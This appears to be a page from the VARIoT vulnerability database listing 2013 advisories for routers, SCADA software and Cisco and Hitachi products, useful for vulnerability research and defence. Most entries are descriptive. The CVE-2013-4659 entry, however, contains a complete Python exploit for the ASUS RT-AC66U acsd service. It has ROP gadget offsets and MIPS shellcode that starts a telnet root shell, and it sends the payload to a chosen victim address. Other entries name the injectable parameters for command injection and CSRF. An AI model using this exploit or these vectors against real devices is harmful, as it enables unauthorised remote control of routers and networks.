Trendnet TEW-812DRU Cross-Site Request Forgery Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201307-0076 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. A cross-site request forgery vulnerability exists in the TRENDnet TEW-812DRU router with firmware version 1.0.8.0
| VAR-201402-0091 | CVE-2013-3365 |
TRENDnet TEW-812DRU Arbitrary command execution vulnerability in router
Related entries in the VARIoT exploits database: VAR-E-201307-0076 |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU multiple scripts incorrectly filter user-submitted input, allowing remote attackers to exploit malicious exploits to submit malicious requests to inject OS commands and execute them with WEB privileges. Trendnet TEW-812DRU is prone to multiple command-injection vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary commands in the context of the affected devices. There is a security vulnerability in TRENDnet TEW-812DRU router, the vulnerability is caused by the program not sufficiently filtering the 'NtpDstEnd' and '\'\'NtpDstOffset' fields in the setNTP.cgi script
| VAR-201703-0032 | CVE-2013-4659 |
ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow
Related entries in the VARIoT exploits database: VAR-E-201307-0406 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python
import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
# *Security Analsyts @ Independent Security Evaluators
# Software Vendor*********http://asus.com
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
#
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[*] Discovered and Reported: June 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
[*] Software Vendor: http://asus.com
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
[*] Software: acsd wireless service (Listens on TCP/5916)
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
victim = targServer()
port = int(5916)
acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "\x09\xf8\xa0\x03"
JuNk = "\x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
shellcode += "\x41\x61\x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
net_sock.send(sploit)
sleep(1)
except:
print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
net_sock.close()
except:
print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
if __name__ == "__main__":
main()
| VAR-201307-0565 | No CVE | Cogent Real-Time Systems DataHub Remote Stack Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cogent Datahub. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web server component's handling of HTTP headers. By sending an overlarge HTTP header, an attacker can overflow a fixed size stack buffer. This vulnerability allows for an attacker to execute arbitrary code in the context of the Datahub process. Cogent Real-Time Systems DataHub is a set of real-time data system integration suite based on B / S architecture by Cogent Real-Time Systems of Canada. The kit includes tools such as DataHub WebView and DataHub QuickTrend. Cogent Real-Time Systems DataHub 7.3.0 vulnerabilities exist, other versions may also be affected. Failed exploit attempts will likely result in denial-of-service conditions
| VAR-201307-0318 | CVE-2013-2785 | GE Proficy CIMPLICITY 'CimWebServer' Remote Stack Buffer Overflow Vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in CimWebServer.exe in the WebView component in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY before 8.0 SIM 27, 8.1 before SIM 25, and 8.2 before SIM 19, and Proficy Process Systems with CIMPLICITY, allow remote attackers to execute arbitrary code via crafted data in packets to TCP port 10212, aka ZDI-CAN-1621 and ZDI-CAN-1624. GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY and Proficy Process Systems with CIMPLICITY of WebView Component CimWebServer.exe Contains a buffer overflow vulnerability. Zero Day Initiative The vulnerability ZDI-CAN-1621 and ZDI-CAN-1624 It was announced as.By a third party TCP port 10212 Arbitrary code may be executed via crafted data in the packet to the. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of GE Proficy CIMPLICITY. Authentication is not required to exploit this vulnerability. The specific flaw exists within the CimWebServer component. This component performs insufficient bounds checking on user-supplied data passed in the szPassword field which results in stack corruption. An attacker can leverage this situation to execute code under the context of the process. GE Proficy CIMPLICITY is a monitoring software developed by GE and one of the industry's leading HMI/SCADA software
| VAR-201910-1350 | CVE-2013-4848 | TP-Link TL-WDR4300 Vulnerable to cross-site request forgery |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
TP-Link TL-WDR4300 version 3.13.31 has multiple CSRF vulnerabilities. TP-Link TL-WDR4300 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The TP-Link TL-WDR4300 is a wireless router from China's TP-Link.
A cross-site request forgery vulnerability exists in version 3.13.31 of TP-Link TL-WDR4300. The vulnerability stems from the fact that the WEB application does not fully verify whether the request is from a trusted user. The vulnerability can be exploited by an attacker to send an unexpected response to the server through the affected client. Request.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions and compromise the affected device
| VAR-201307-0480 | CVE-2013-4697 | JP1/IT Desktop Management - Manager and Hitachi IT Operations Director vulnerable to privilege escalation |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Multiple unspecified vulnerabilities in Hitachi JP1/IT Desktop Management - Manager 09-50 through 09-50-03, 09-51 through 09-51-05, 10-00 through 10-00-02, and 10-01 through 10-01-02; Hitachi Job Management Partner 1/IT Desktop Management - Manager 09-50 through 09-50-03 and 10-01; and Hitachi IT Operations Director 02-50 through 02-50-07, 03-00 through 03-00-12, and 04-00 through 04-00-01 allow remote authenticated users to gain privileges via unknown vectors. Taizo Tsukamoto of GLOBAL SECURITY EXPERTS inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Users without administrative privileges may obtain administrative privileges. Multiple Hitachi products have security holes that allow local attackers to use the holes to elevate privileges.
No detailed vulnerability details are provided at this time.
A local attacker may leverage these issues to escalate privileges. This may lead to other attacks
| VAR-201308-0493 | No CVE | Broadkam PJ871 Verification Bypass Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
The Broadkam PJ871 is a DSL router device. The Broadkam PJ871 DSL Router does not properly validate password replacement requests, allowing remote attackers to exploit vulnerabilities to submit special requests, change any user password, and grant unauthorized access to the appliance. Broadkam PJ871 is prone to an authentication-bypass vulnerability.
An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions.
http://drupal.org/node/207891
| VAR-201307-0236 | CVE-2013-3445 | Cisco Identity Services Engine Service disruption in future firewall subsystems (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The firewall subsystem in Cisco Identity Services Engine has an incorrect rule for open ports, which allows remote attackers to cause a denial of service (CPU consumption or process crash) via a flood of malformed IP packets, aka Bug ID CSCug94572. Cisco Identity Services Engine Software is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCug94572. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. A security vulnerability exists in the firewall subsystem in Cisco ISE due to a program that opens ports for the wrong user role
| VAR-201307-0201 | CVE-2013-3414 | Cisco Adaptive Security Appliances of WebVPN Portal login page cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the WebVPN portal login page on Cisco Adaptive Security Appliances (ASA) devices allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCug83080.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCug83080